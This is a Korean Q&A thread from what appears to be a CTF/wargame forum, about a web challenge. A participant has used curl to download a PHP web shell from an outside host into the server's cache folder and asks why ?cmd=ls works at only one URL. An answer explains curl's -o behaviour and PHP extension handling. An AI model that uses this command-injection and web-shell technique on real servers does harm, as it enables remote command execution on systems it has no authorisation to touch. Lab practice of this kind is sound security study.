완료됨
shell.php 경로
http://host3.dreamhack.games:10819/cache/44c1d01693afb3d35dd5b1775d5925b4?cmd=ls
위에는 https://s2ongmo.github.io/shell.php -o ./shell.php에 대한 결과이구
아래는 제가 임의로 찾아간 경로입니다.
http://host3.dreamhack.games:10819/cache/shell.php?cmd=ls
2개의 차이점이 뭐길래
cmd=ls 결과가 아래 명령에만 떨어지는 걸까요?
그리구 COPY ./deploy/src /var/www/html/여서 /var/www/html에 index.php가 있는줄 알았는데 shell.php가 cache밑으로 들어간 이유는 무엇인가요?
#web
답변
1
zetacode
대표 업적 없음
(1) shell.php 생성되는 경로
- 저는 동일한 경로로 실행했을 때,
/var/www/html/cache/shell.php생성이 안되는데 어떻게 입력했을 때 위의 경로가 생성되는 걸까요?
참고로 전 index.php에 나오는 form에 알려주신 경로를 그대로 넣었습니다.
(2) /cache/md5 경로에서 webshell이 안먹는 이유
curl https://s2ongmo.github.io/shell.php -o ./shell.php실행 결과를 파일로 저장하는데,curl명령시 생성파일 이름을 지정하게 되면 다운받은 컨텐츠 내용을 출력하지 않으므로 md5로 생성되는 파일은 빈파일이 됩니다.- 확장자가 없기 때문에 php로 해석되지 않아서 내용이 있어도 실행은 되지 않습니다.